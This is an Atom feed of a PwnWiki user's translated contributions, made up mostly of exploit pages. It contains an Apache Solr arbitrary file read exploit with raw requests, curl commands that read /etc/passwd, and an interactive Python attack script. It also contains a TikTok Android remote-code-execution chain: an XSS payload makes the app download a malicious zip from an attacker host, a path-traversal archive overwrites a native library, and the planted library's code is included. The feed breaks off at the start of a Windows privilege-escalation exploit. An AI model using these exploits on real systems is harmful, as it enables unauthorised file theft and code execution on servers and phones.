<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=LovelyWei</id>
	<title>PwnWiki - User contributions [Chinese]</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=LovelyWei"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Special:Contributions/LovelyWei"/>
	<updated>2026-04-09T01:23:06Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/en&amp;diff=1933</id>
		<title>Apache Solr任意文件讀取漏洞/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/en&amp;diff=1933"/>
		<updated>2021-04-29T03:39:23Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;==File Reading==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages   /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Vulnerability Impact==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Apache Solr &amp;lt;= 8.8.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Exploit==&lt;br /&gt;
&lt;br /&gt;
First, go to the admin page and get the information about core&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&amp;amp;wt=json&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Send the following packet&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /solr/ckan/config HTTP/1.1&lt;br /&gt;
Host: xxx.xxx.xxx:8983&lt;br /&gt;
Content-Length: 99&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
Origin: http://118.31.46.134:8983&lt;br /&gt;
Content-Type: application/json&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&lt;br /&gt;
Referer: http://118.31.46.134:8983/solr/ckan/config&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6&lt;br /&gt;
Connection: close&lt;br /&gt;
&lt;br /&gt;
{&amp;quot;set-property&amp;quot;:{&amp;quot;requestDispatcher.requestParsers.enableRemoteStreaming&amp;quot;:true},&amp;quot;olrkzv64tv&amp;quot;:&amp;quot;=&amp;quot;}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==File Reading==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /solr/ckan/debug/dump?param=ContentStreams HTTP/1.1&lt;br /&gt;
Host: xxx.xxx.xxx.xxx:8983&lt;br /&gt;
Content-Length: 29&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36&lt;br /&gt;
Origin: http://118.31.46.134:8983&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&lt;br /&gt;
Referer: http://118.31.46.134:8983/solr/ckan/config&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6&lt;br /&gt;
Connection: close&lt;br /&gt;
&lt;br /&gt;
stream.url=file:///etc/passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
curl request as&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
curl -d '{&amp;quot;set-property&amp;quot; : {&amp;quot;requestDispatcher.requestParsers.enableRemoteStreaming&amp;quot;:true}}' http://xxx.xxx.xxx.xxx:8983/solr/{corename}/config -H 'Content-type:application/json'&lt;br /&gt;
curl &amp;quot;http://xxx.xxx.xxx.xxx:8983/solr/db/debug/dump?param=ContentStreams&amp;quot; -F &amp;quot;stream.url=file://etc/passwd&amp;quot; &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import random&lt;br /&gt;
import re&lt;br /&gt;
import base64&lt;br /&gt;
import time&lt;br /&gt;
from lxml import etree&lt;br /&gt;
import json&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning&lt;br /&gt;
&lt;br /&gt;
def title():&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech           \033[0m')&lt;br /&gt;
    print('+  \033[34mGithub : https://github.com/PeiQi0        \033[0m')&lt;br /&gt;
    print('+  \033[34m公众号  : PeiQi文库                        \033[0m')&lt;br /&gt;
    print('+  \033[34mVersion: Apache Solr &amp;lt; 8.2.0            \033[0m')&lt;br /&gt;
    print('+  \033[36m使用格式: python3 CVE-2019-0193.py       \033[0m')&lt;br /&gt;
    print('+  \033[36mUrl    &amp;gt;&amp;gt;&amp;gt; http://xxx.xxx.xxx.xxx:8983  \033[0m')&lt;br /&gt;
    print('+  \033[36mFile   &amp;gt;&amp;gt;&amp;gt; 文件名称或目录                  \033[0m')&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
&lt;br /&gt;
def POC_1(target_url):&lt;br /&gt;
    core_url = target_url + &amp;quot;/solr/admin/cores?indexInfo=false&amp;amp;wt=json&amp;quot;&lt;br /&gt;
    try:&lt;br /&gt;
        response = requests.request(&amp;quot;GET&amp;quot;, url=core_url, timeout=10)&lt;br /&gt;
        core_name = list(json.loads(response.text)[&amp;quot;status&amp;quot;])[0]&lt;br /&gt;
        print(&amp;quot;\033[32m[o] 成功获得core_name,Url为：&amp;quot; + target_url + &amp;quot;/solr/&amp;quot; + core_name + &amp;quot;/config\033[0m&amp;quot;)&lt;br /&gt;
        return core_name&lt;br /&gt;
    except:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 目标Url漏洞利用失败\033[0m&amp;quot;)&lt;br /&gt;
        sys.exit(0)&lt;br /&gt;
&lt;br /&gt;
def POC_2(target_url, core_name):&lt;br /&gt;
    vuln_url = target_url + &amp;quot;/solr/&amp;quot; + core_name + &amp;quot;/config&amp;quot;&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;Content-type&amp;quot;:&amp;quot;application/json&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    data = '{&amp;quot;set-property&amp;quot; : {&amp;quot;requestDispatcher.requestParsers.enableRemoteStreaming&amp;quot;:true}}'&lt;br /&gt;
    try:&lt;br /&gt;
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)&lt;br /&gt;
        print(&amp;quot;\033[36m[o] 正在准备文件读取...... \033[0m&amp;quot;.format(target_url))&lt;br /&gt;
        if &amp;quot;This&amp;quot; in response.text and response.status_code == 200:&lt;br /&gt;
            print(&amp;quot;\033[32m[o] 目标 {} 可能存在漏洞 \033[0m&amp;quot;.format(target_url))&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 目标 {} 不存在漏洞\033[0m&amp;quot;.format(target_url))&lt;br /&gt;
            sys.exit(0)&lt;br /&gt;
&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 请求失败 \033[0m&amp;quot;, e)&lt;br /&gt;
&lt;br /&gt;
def POC_3(target_url, core_name, File_name):&lt;br /&gt;
    vuln_url = target_url + &amp;quot;/solr/{}/debug/dump?param=ContentStreams&amp;quot;.format(core_name)&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    data = 'stream.url=file://{}'.format(File_name)&lt;br /&gt;
    try:&lt;br /&gt;
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)&lt;br /&gt;
        response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=5)&lt;br /&gt;
        if &amp;quot;No such file or directory&amp;quot; in response.text:    &lt;br /&gt;
            print(&amp;quot;\033[31m[x] 读取{}失败 \033[0m&amp;quot;.format(File_name))&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;\033[36m[o] 响应为:\n{} \033[0m&amp;quot;.format(json.loads(response.text)[&amp;quot;streams&amp;quot;][0][&amp;quot;stream&amp;quot;]))&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 请求失败 \033[0m&amp;quot;, e)&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    title()&lt;br /&gt;
    target_url = str(input(&amp;quot;\033[35mPlease input Attack Url\nUrl &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;))&lt;br /&gt;
    core_name = POC_1(target_url)&lt;br /&gt;
    POC_2(target_url, core_name)&lt;br /&gt;
    while True:&lt;br /&gt;
        File_name = str(input(&amp;quot;\033[35mFile &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;))&lt;br /&gt;
        POC_3(target_url, core_name, File_name)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/6/en&amp;diff=1932</id>
		<title>Translations:Apache Solr任意文件讀取漏洞/6/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/6/en&amp;diff=1932"/>
		<updated>2021-04-29T03:38:47Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;curl request as&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/6/en&amp;diff=1931</id>
		<title>Translations:Apache Solr任意文件讀取漏洞/6/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/6/en&amp;diff=1931"/>
		<updated>2021-04-29T03:38:32Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;curl request is&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;curl request is&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/5/en&amp;diff=1930</id>
		<title>Translations:Apache Solr任意文件讀取漏洞/5/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/5/en&amp;diff=1930"/>
		<updated>2021-04-29T03:38:18Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;==File Reading==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==File Reading==&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/4/en&amp;diff=1929</id>
		<title>Translations:Apache Solr任意文件讀取漏洞/4/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/4/en&amp;diff=1929"/>
		<updated>2021-04-29T03:37:36Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;Send the following packet&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Send the following packet&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/3/en&amp;diff=1928</id>
		<title>Translations:Apache Solr任意文件讀取漏洞/3/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/3/en&amp;diff=1928"/>
		<updated>2021-04-29T03:37:15Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;First, go to the admin page and get the information about core&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;First, go to the admin page and get the information about core&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/2/en&amp;diff=1927</id>
		<title>Translations:Apache Solr任意文件讀取漏洞/2/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/2/en&amp;diff=1927"/>
		<updated>2021-04-29T03:36:10Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;==Exploit==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Exploit==&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/1/en&amp;diff=1926</id>
		<title>Translations:Apache Solr任意文件讀取漏洞/1/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/1/en&amp;diff=1926"/>
		<updated>2021-04-29T03:35:11Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;==Vulnerability Impact==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Vulnerability Impact==&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/Page_display_title/en&amp;diff=1925</id>
		<title>Translations:Apache Solr任意文件讀取漏洞/Page display title/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:Apache_Solr%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AE%80%E5%8F%96%E6%BC%8F%E6%B4%9E/Page_display_title/en&amp;diff=1925"/>
		<updated>2021-04-29T03:35:06Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;Apache Solr Arbitrary File Read Vulnerability&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Apache Solr Arbitrary File Read Vulnerability&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E5%AE%89%E5%8D%93%E7%89%88TikTok_RCE%E6%BC%8F%E6%B4%9E/en&amp;diff=1924</id>
		<title>安卓版TikTok RCE漏洞/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E5%AE%89%E5%8D%93%E7%89%88TikTok_RCE%E6%BC%8F%E6%B4%9E/en&amp;diff=1924"/>
		<updated>2021-04-29T03:33:33Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;Malicious library code:&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages  /&amp;gt;&lt;br /&gt;
Created a zip file with a path that traverses the file name and overwrites the&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dphoeniixx@MacBook-Pro Tiktok % 7z l libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip&lt;br /&gt;
​&lt;br /&gt;
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21&lt;br /&gt;
p7zip Version 16.02 (locale=utf8,Utf16=on,HugeFiles=on,64 bits,16 CPUs x64)&lt;br /&gt;
​&lt;br /&gt;
Scanning the drive for archives:&lt;br /&gt;
1 file, 1930 bytes (2 KiB)&lt;br /&gt;
​&lt;br /&gt;
Listing archive: libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip&lt;br /&gt;
​&lt;br /&gt;
--&lt;br /&gt;
Path = libran_a1ef01b09a3d9400b77144bbf9ad59b1.zip&lt;br /&gt;
Type = zip&lt;br /&gt;
Physical Size = 1930&lt;br /&gt;
​&lt;br /&gt;
   Date      Time    Attr         Size   Compressed  Name&lt;br /&gt;
------------------- ----- ------------ ------------  ------------------------&lt;br /&gt;
2020-11-26 04:08:29 .....         5896         1496  ../../../../../../../../../data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so&lt;br /&gt;
------------------- ----- ------------ ------------  ------------------------&lt;br /&gt;
2020-11-26 04:08:29               5896         1496  1 files&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now we can override native-libraries with a malicious library to execute our code. It will not be executed unless the user restarts the Application.&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
document.title = &amp;quot;Loading..&amp;quot;;&lt;br /&gt;
document.write(&amp;quot;&amp;lt;h1&amp;gt;Loading..&amp;lt;/h1&amp;gt;&amp;quot;);&lt;br /&gt;
if (document &amp;amp;&amp;amp; window.name != &amp;quot;finished&amp;quot;) { // the XSS will be fired multiple time before loading the page and after. this condition to make sure that the payload won't fire multiple time.&lt;br /&gt;
    window.name = &amp;quot;finished&amp;quot;;&lt;br /&gt;
    window.ToutiaoJSBridge.invokeMethod(JSON.stringify({&lt;br /&gt;
        &amp;quot;__callback_id&amp;quot;: &amp;quot;0&amp;quot;,&lt;br /&gt;
        &amp;quot;func&amp;quot;: &amp;quot;preloadMiniApp&amp;quot;,&lt;br /&gt;
        &amp;quot;__msg_type&amp;quot;: &amp;quot;callback&amp;quot;,&lt;br /&gt;
        &amp;quot;params&amp;quot;: {&lt;br /&gt;
            &amp;quot;mini_app_url&amp;quot;: &amp;quot;https://microapp/&amp;quot;&lt;br /&gt;
        },&lt;br /&gt;
        &amp;quot;JSSDK&amp;quot;: &amp;quot;1&amp;quot;,&lt;br /&gt;
        &amp;quot;namespace&amp;quot;: &amp;quot;host&amp;quot;,&lt;br /&gt;
        &amp;quot;__iframe_url&amp;quot;: &amp;quot;http://d.c/&amp;quot;&lt;br /&gt;
    })); // initialize Mini App&lt;br /&gt;
    window.ToutiaoJSBridge.invokeMethod(JSON.stringify({&lt;br /&gt;
        &amp;quot;__callback_id&amp;quot;: &amp;quot;0&amp;quot;,&lt;br /&gt;
        &amp;quot;func&amp;quot;: &amp;quot;openSchema&amp;quot;,&lt;br /&gt;
        &amp;quot;__msg_type&amp;quot;: &amp;quot;callback&amp;quot;,&lt;br /&gt;
        &amp;quot;params&amp;quot;: {&lt;br /&gt;
            &amp;quot;schema&amp;quot;: &amp;quot;aweme://wiki?url=javascript:location.replace(%22intent%3A%2F%2Fwww.google.com.eg%2F%3Faction%3DsdkUpdate%26latestSDKUrl%3Dhttp%3A%2F%2F{ATTACKER_HOST}%2Flibran_a1ef01b09a3d9400b77144bbf9ad59b1.zip%26sdkUpdateVersion%3D1.87.1.11%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapp.tmatest.TmaTestActivity%3Bpackage%3Dcom.zhiliaoapp.musically%3Baction%3Dandroid.intent.action.VIEW%3Bend%22)%3B%0A&amp;amp;noRedirect=false&amp;amp;title=First%20Stage&amp;amp;disable_app_link=false&amp;quot;&lt;br /&gt;
        },&lt;br /&gt;
        &amp;quot;JSSDK&amp;quot;: &amp;quot;1&amp;quot;,&lt;br /&gt;
        &amp;quot;namespace&amp;quot;: &amp;quot;host&amp;quot;,&lt;br /&gt;
        &amp;quot;__iframe_url&amp;quot;: &amp;quot;http://iframe.attacker.com/&amp;quot;&lt;br /&gt;
    })); // Download malicious zip file that will overwite /data/data/com.zhiliaoapp.musically/app_lib/df_rn_kit/df_rn_kit_a3e37c20900a22bc8836a51678e458f7/arm64-v8a/libjsc.so&lt;br /&gt;
    setTimeout(function() {&lt;br /&gt;
        window.ToutiaoJSBridge.invokeMethod(JSON.stringify({&lt;br /&gt;
            &amp;quot;__callback_id&amp;quot;: &amp;quot;0&amp;quot;,&lt;br /&gt;
            &amp;quot;func&amp;quot;: &amp;quot;openSchema&amp;quot;,&lt;br /&gt;
            &amp;quot;__msg_type&amp;quot;: &amp;quot;callback&amp;quot;,&lt;br /&gt;
            &amp;quot;params&amp;quot;: {&lt;br /&gt;
                &amp;quot;schema&amp;quot;: &amp;quot;aweme://wiki?url=javascript:location.replace(%22intent%3A%23Intent%3Bscheme%3Dhttps%3Bcomponent%3Dcom.zhiliaoapp.musically%2Fcom.tt.miniapphost.placeholder.MiniappTabActivity0%3Bpackage%3Dcom.zhiliaoapp.musically%3BS.miniapp_url%3Dhttps%3Bend%22)%3B%0A&amp;amp;noRedirect=false&amp;amp;title=Second%20Stage&amp;amp;disable_app_link=false&amp;quot;&lt;br /&gt;
            },&lt;br /&gt;
            &amp;quot;JSSDK&amp;quot;: &amp;quot;1&amp;quot;,&lt;br /&gt;
            &amp;quot;namespace&amp;quot;: &amp;quot;host&amp;quot;,&lt;br /&gt;
            &amp;quot;__iframe_url&amp;quot;: &amp;quot;http://iframe.attacker.com/&amp;quot;&lt;br /&gt;
        })); // load the malicious library after overwrtting it.&lt;br /&gt;
    }, 5000);&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Malicious library code:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;jni.h&amp;gt;&lt;br /&gt;
#include &amp;lt;string&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
​&lt;br /&gt;
​&lt;br /&gt;
JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {&lt;br /&gt;
    system(&amp;quot;id &amp;gt; /data/data/com.zhiliaoapp.musically/PoC&amp;quot;);&lt;br /&gt;
    return JNI_VERSION_1_6;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:%E5%AE%89%E5%8D%93%E7%89%88TikTok_RCE%E6%BC%8F%E6%B4%9E/3/en&amp;diff=1923</id>
		<title>Translations:安卓版TikTok RCE漏洞/3/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:%E5%AE%89%E5%8D%93%E7%89%88TikTok_RCE%E6%BC%8F%E6%B4%9E/3/en&amp;diff=1923"/>
		<updated>2021-04-29T03:33:25Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;Malicious library code:&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Malicious library code:&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:%E5%AE%89%E5%8D%93%E7%89%88TikTok_RCE%E6%BC%8F%E6%B4%9E/2/en&amp;diff=1922</id>
		<title>Translations:安卓版TikTok RCE漏洞/2/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:%E5%AE%89%E5%8D%93%E7%89%88TikTok_RCE%E6%BC%8F%E6%B4%9E/2/en&amp;diff=1922"/>
		<updated>2021-04-29T03:32:46Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;Now we can override native-libraries with a malicious library to execute our code. It will not be executed unless the user restarts the Application.&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Now we can override native-libraries with a malicious library to execute our code. It will not be executed unless the user restarts the Application.&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:%E5%AE%89%E5%8D%93%E7%89%88TikTok_RCE%E6%BC%8F%E6%B4%9E/1/en&amp;diff=1921</id>
		<title>Translations:安卓版TikTok RCE漏洞/1/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:%E5%AE%89%E5%8D%93%E7%89%88TikTok_RCE%E6%BC%8F%E6%B4%9E/1/en&amp;diff=1921"/>
		<updated>2021-04-29T03:31:49Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;Created a zip file with a path that traverses the file name and overwrites the&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Created a zip file with a path that traverses the file name and overwrites the&lt;/div&gt;</summary>
		<author><name>LovelyWei</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Windows7/win2008%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%870day/en&amp;diff=1920</id>
		<title>Windows7/win2008特權提升0day/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Windows7/win2008%E7%89%B9%E6%AC%8A%E6%8F%90%E5%8D%870day/en&amp;diff=1920"/>
		<updated>2021-04-29T03:31:44Z</updated>

		<summary type="html">&lt;p&gt;LovelyWei: Created page with &amp;quot;Save the exploit as &amp;lt;code&amp;gt;taskxpl.wsf&amp;lt;/code&amp;gt;&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
Save the exploit as &amp;lt;code&amp;gt;taskxpl.wsf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;job id=&amp;quot;tasksch-wD-0day&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;script language=&amp;quot;Javascript&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
crc_table = new Array(&lt;br /&gt;
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419,&lt;br /&gt;
0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4,&lt;br /&gt;
0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07,&lt;br /&gt;
